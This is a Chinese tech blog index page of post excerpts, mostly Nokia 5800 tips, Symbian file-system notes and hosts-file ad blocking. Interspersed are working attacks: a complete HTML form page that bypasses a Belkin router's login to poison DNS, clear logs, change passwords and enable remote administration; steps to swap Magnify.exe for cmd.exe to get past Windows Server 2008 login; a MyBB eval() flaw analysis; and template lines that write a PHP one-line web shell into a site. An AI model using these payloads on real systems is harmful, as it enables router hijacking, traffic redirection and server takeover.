Chinadu`s Blog

>>>>>>>>>>>>>>>>>>>>升级存在一定风险,使用前请三思.<<<<<<<<<<<<<<<<<<<

一、了解5800MX其本知识

1、5800MX频段

RM-427：只支持GSM 900/1800
RM-356：HSDPA，WCDMA  900/2100
RM-428：HSDPA，WCDMA  850/1900

2、销售地区

RM-356：销售地区包括香港、亚太、欧洲等。
RM-428：美版，不能用国内的3G(W-CDMA),销售地区包括北美、南美、澳洲等。
RM-427：国行(包括定制机)，无WLAN、3G。专为中国设计。

3、快捷键

*#06#　    查询IMEI号码 所有手机
*#0000#   查询当前软件版本号　　所有手机通用
*#2820#　查询蓝牙设备地址　　　S60和S40手机通用
*#7370#   格式化手机(原始密码12345)

二、可升级Code

1、升级V31有中文Code，已测试，
阅读全文...

<html>

<head>

</head>

<body>

<b>这个HTML代码可以绕过webinterface密码保护的贝尔金无线路由器+ADSL2调制解调器<br>

它的工作模式F5D7632-4V6与升级固件6.01.08</b>

<br>

<form action="http://192.168.2.1/cgi-bin/setup_dns.exe" name=dnspoison method=post>

改变DNS域名服务器（IP可以不一样）<br>

<input name=page type=hidden value="setup_dns">

<input name=logout type=hidden value="">

<input name=auto_from_isp type=hidden value="0">

<input name=dns1_1 type=text value="1">

<input name=dns1_2 type=text value="2">

<input name=dns1_3 type=text value="3">

<input name=dns1_4 type=text value="4">

<br>

<input name=dns2_1 type=text value="1">

<input name=dns2_2 type=text value="2">

<input name=dns2_3 type=text value="3">

<input name=dns2_4 type=text value="5">

<br>

<input name=submit type=submit value="放毒">

</form>

<br>

<br>

<form action="http://192.168.2.1/cgi-bin/statusprocess.exe" name=clearlog method=post>

清除日志文件<br>

<input name=securityclear type=submit value="清除">

</form>

<br>

<br>

<form ACTION="http://192.168.2.1/cgi-bin/system_all.exe" method=post name=changepassword>

改变时间、密码（如果您有旧的密码）、远程管理、UPnP<br>

和自动固件更新（美好的结合DNS中毒）<br>

<input type="hidden" name="restart_time" value="0">

<input type="hidden" name="reload" value="1">

<input type="hidden" name="restart_page" value='document.location.href="system.stm";'>

<input type="hidden" name="location_page" value="system.stm">

<input type="hidden" name="server1" value="">

<input type="hidden" name="server2" value="">

<!-- for clock -->

<input type="hidden" name="year" value="">

<input type="hidden" name="mon" value="">

<input type="hidden" name="day" value="">

<input type="hidden" name="hour" value="">

<input type="hidden" name="min" value="">

<input type="hidden" name="sec" value="">

<br>旧密码<br>

<input type="password" size="12" maxlength="12" name="userOldPswd" value="">

<br>新密码，两次<br>

<input type="password" size="12" maxlength="12" name="userNewPswd" value="">

<input type="password" size="12" maxlength="12" name="userConPswd" value="">

<br>登录超时（1-99分钟）<br>

<input type="text" name="timeout" size="3" maxlength="3" value="10">

<br> 时间和时区：<br>

夏令： <br>

<input type="checkbox" name="daylight" value="1">时区（号码）<br>

<input type="text" name="time_zone" value="26">

<input type="checkbox" name="enable_ntp" value="1">启用自动时间服务器维护<br>

<tr>

<td width="240">主服务器</td>

<td width="360">

<select name="time1">

<option>132.163.4.102 - North America</option>

<option>192.5.41.41 - North America</option>

<option>192.5.41.209 - North America</option>

<option>207.200.81.113 - North America</option>

<option>208.184.49.9 - North America</option>

<option>129.132.2.21 - Europe</option>

<option>130.149.17.8 - Europe</option>

<option>128.250.36.3 - Australia</option>

<option>137.189.8.174 - Asia Pacific</option>

</select>

</td>

</tr>

<tr>

<td width="240">副服务器</td>

<td width="360">

<select name="time2">

<option>132.163.4.102 - North America</option>

<option>192.5.41.41 - North America</option>

<option>192.5.41.209 - North America</option>

<option>207.200.81.113 - North America</option>

<option>208.184.49.9 - North America</option>

<option>129.132.2.21 - Europe</option>

<option>130.149.17.8 - Europe</option>

<option>128.250.36.3 - Australia</option>

<option>137.189.8.174 - Asia Pacific</option>

</select>

</td>

</tr>

<br>远程管理：<br>

<input type="checkbox" name="allow_all" value="1">任何IP地址都可以远程管理路由器<br>

只有这个IP地址可以远程管理路由器<br>

<input name="IP1" size="3" maxlength="3" value="0">.

<input name="IP2" size="3" maxlength="3" value="0">.

<input name="IP3" size="3" maxlength="3" value="0">.

<input name="IP4" size="3" maxlength="3" value="0">

<br> 远程端口：

<input name="REMOTEPORT" size="5" maxlength="5" value="0">

<br>NAT 授权：<br>

<input type=radio name=Nat_enable value=1>授权<br>

<input type=radio name=Nat_enable value=0>废除<br>

<br>UPnP<br>

<input type="radio" name="upnp_enable" value=1>授权<br>

<input type=radio name=upnp_enable value=0>废除<br>

<br>自动更新固件<br>

<input type="radio" name="autoUpdate_enable" value=1>授权<br>

<input type="radio" name="autoUpdate_enable" value=0>废除<br>

</form>

<form method="POST" action="http://192.168.2.1/cgi-bin/restore.exe" name="RebootForm">

<br>恢复出厂默认值（包括密码）<br>

<input type="hidden" name="page" value="tools_restore">

<input type="hidden" name="logout">

<input type="submit" value="恢复默认值" style="{width:120px;}" class="submitBtn">

</form>

</body>

</html>

Windows Server 2008是微软Windows服务器产品中最新的操作系统版本。它是基于Windows NT 6.0 SP1的内核。
Microsoft详细信息：http://www.microsoft.com/china/windowsserver2008/

虽然与早期版本相比非常安全，但它可以很容易地绕过密码保护进入主机。
在本文中，我将展示一个简单而有效的方法绕过Windows Server 2008的密码保护。

概念演示：
为了能够绕过密码保护，我们首先需要添加PING CD盘(http://ping.windowsdream.com/ping/Releases/3.00.01/PING-3.00.iso)或其他支持 NTFS-3G驱动的Linux Live光盘（NTFS-3G是一个跨平台执行的Windows NTFS文件系统，支持读/写能力）。

我们首先检查哪个分区是Windows NTFS分区，在这个例子中是/dev/sd1。
fdisk –l | grep NTFS

然后，我们创建目录，将安装Windows文件：
mkdir –p /mnt/windows

因此，我们将Windows分区中的NTFS-3G驱动挂载到/mnt/Windows目录中：
mount –t ntfs-3g /dev/sda1/mnt/windows

现在，我们将一个可执行文件cmd.exe替换为Magnify.exe文件：
mv Magnify.exe Magnify.bck
cp cmd.exe Magnify.exe

阅读全文...

谷歌，Adobe和其他大公司有针对性的攻击的消息上周已经被披露，最初安全人员们预计是采用恶意的PDF文件进行攻击，但在上周四，微软承认攻击是由一个Internet Explorer中新的安全漏洞引发。
目前已经检测到针对此漏洞的攻击代码正在蔓延，相应的恶意代码页面也已经出现，安全研究机构WebSense今日发出安全警告，以下是技术分析截图：

阅读全文...

1. C盘文件的具体介绍
C盘文件的具体介绍·（E盘文件的原理和C盘基本一样）·
Images 图像，图片存储文件夹
Sounds 声音片段，包含两个子文件夹
Sounds/Simple 铃声
Sounds/Digital 数字声音
Videos 视频片段，视频文件存储文件夹
Others 其他
System 是手机安装文件的系统文件夹下面对它里面的文件和文件夹做下具体的介绍：
Apps 存放的是安装软件程序的文件夹。
Apps/Phone 是更改网标后形成的文件夹，此目录中还有oplogo的子目录，bmp文件就存在这个目录里，删除这个文件就可以恢复手机默认的网标。
bootdata 存放的是手机导入数据，最好不要删除或者修改里面的文件。
Data 存放的是如ini、dat、cdr等后缀的文件，这些是程序所保存设置的数据，最好不要删除或者修改里面的文件。
dataNotepad.dat 存放的是记事本中的内容。
databackgroundimage.mbm 存放的是桌面墙纸图片文件。
dataApplications.dat 存放的是程序数据文件。
datawapstore 存放的是用WAP上网时的一些设定和网页缓存。
systemDataCLOCKAPP.dat 存放的是时钟设定存档文件。
systemDataCntModel.ini 存放的是电话本初始化文件。
systemDataContacts.cdb 存放的是电话本数据文件。
systemDataLogdbu.dat 手机的通讯数据文件。
systemDatamedialPlayer.dat 自带的RealOne播放机。
systemDatamms_seting.Dat 彩信的设置。
systemDataPinboard 捷径。
systemDataCalcsoft 自带的计算器。
systemDataCalendar 自带的日历。
DataTemplate.n01 存放的是手机短信信模版文件。
DataUnitConverter.int 手存放的是单位转换器初始化文件。
DataBookmarks.db 存放的是书签数据文件,用来记录WAP地址。
DataCACerts.dat 存放的是安装各种软件的证书文件。
Mail 目录下存放着短消息、彩信、电子邮件以及相关的一些设置文件。
SKINS 存放的是主题文件。
Shareddata 存放的是一些程序运行后的写入设置数据。
Temp和YReg 存放的是些临时目录。
Libs 目录里存放着软件相关的dll文件。
midp 存放的是安装的java程序。
Mtm 是有关信息设置的目录
Programs 存放的是一些自动加载的程序文件。
Recogs 存放的是关联方式文件的目录。
Schedules 存放的是一些计划任务类的文件。
favourites 存放的是收藏夹的文件，可移动到E盘的System中，收藏夹是不会受到影响。
install 存放的是软件的安装记录，其中install log文件可以删除，而带有sis后缀的文件最好不要删除，以免以后不能在程序管理里看到并删除程序了。
Magic101 在安装MGS平台的程序以后以后才会生成。
System.ini 系统初始化配置文件，可以删除，但是下次开机使用程序，系统还会再次生成。
Backup.xml 存放的是备份数据
**注意** C盘里面大多是系统文件，不知道它是究竟什么，以及具体的作用是什么，最好不要删除，以免删错了以后，导致手机的一些程序不能正常运行。
阅读全文...

现在越来越多的人在迅雷上看电影了。我也很喜欢，但是我很不喜欢迅雷看看上的15秒广告。当然，也有迅雷工具的广告也很麻烦。于是，我就在网络上搜罗了一翻，找到了一些迅雷屏蔽的技巧。
[修改时，请先将迅雷程序关闭！]

1. 去除迅雷看看15秒广告

在 C:WINDOWSsystem32driversetc 目录下，用记事本打开 hosts 文件。

复制内容到剪贴板 程序代码
找到
127.0.0.1 localhost
在之后加入
------ 屏蔽迅雷看看广告 ------
0.0.0.0 pubstat.sandai.net
0.0.0.0 mcfg.sandai.net
0.0.0.0 biz5.sandai.net
0.0.0.0 float.sandai.net
0.0.0.0 recommend.xunlei.com
0.0.0.0 cl.kankan.xunlei.com

2. 禁止迅雷偷偷上传
阅读全文...

by flyh4t
team: http://www.80vul.com
date: 2010-01-10

测试版本MyBB 1.44.11

[一]漏洞分析

在index.php文件336行左右代码如下：

//index.php,336行左右

$plugins->run_hooks("index_end");
//出现了eval函数，注意参数
eval("$index = "".$templates->get("index")."";");
output_page($index);

看以下eval()函数中的内容是否可以控制，继续找到templates类查看get函数的定义:
阅读全文...

一直在测试5800的各项功能，也遇到了网友说到的一些问题，包括照相问题，在没有任何设置的时候拍下一张照片，非常难看，很模糊，一开始以为是5800自带相机问题，还有的人说5800相机水准不行，经过我的测试，不是这样的，只是我们不会用5800相机而已，其实5800不同于我们以往用的手机拍摄，一键搞定，5800拍照需要很多设置，我要教大家的是如何去设置，这些设置都有什么用。如果你明白了，肯定是会拍出清晰的照片。
1.如何进入设置?哪些个设置重要?哪些个设置不需要动,影响不大.

阅读全文...

1、下载HP_USB_FW.rar，This tool can setup a booting USB flash disk。他可以创建dos的引导程序到U盘里面。下载后解压，执行HPUSBFW.EXE，选FAT32文件系统，快速格式化，要选中创建dos启动 盘，路径指向解压目录下的HPUSBFW目录，这个目录下有引导程序COMMAND.COM、IO.SYS、MSDOS.SYS，这3个文件在格式化完成 后被copy到移动硬盘跟目录下。

阅读全文...

编辑模板的时候写入这几行,拆开写一句话,就行了:

1. <!--{eval $content = "@eval($_POST[c])";}-->

2. <!--{eval $test1 = "<"."?"."php ".$content."?>";}-->

3. <!--{eval fputs(fopen(S_ROOT.'./templates/default/model_cache.php','w+'),$test1);}-->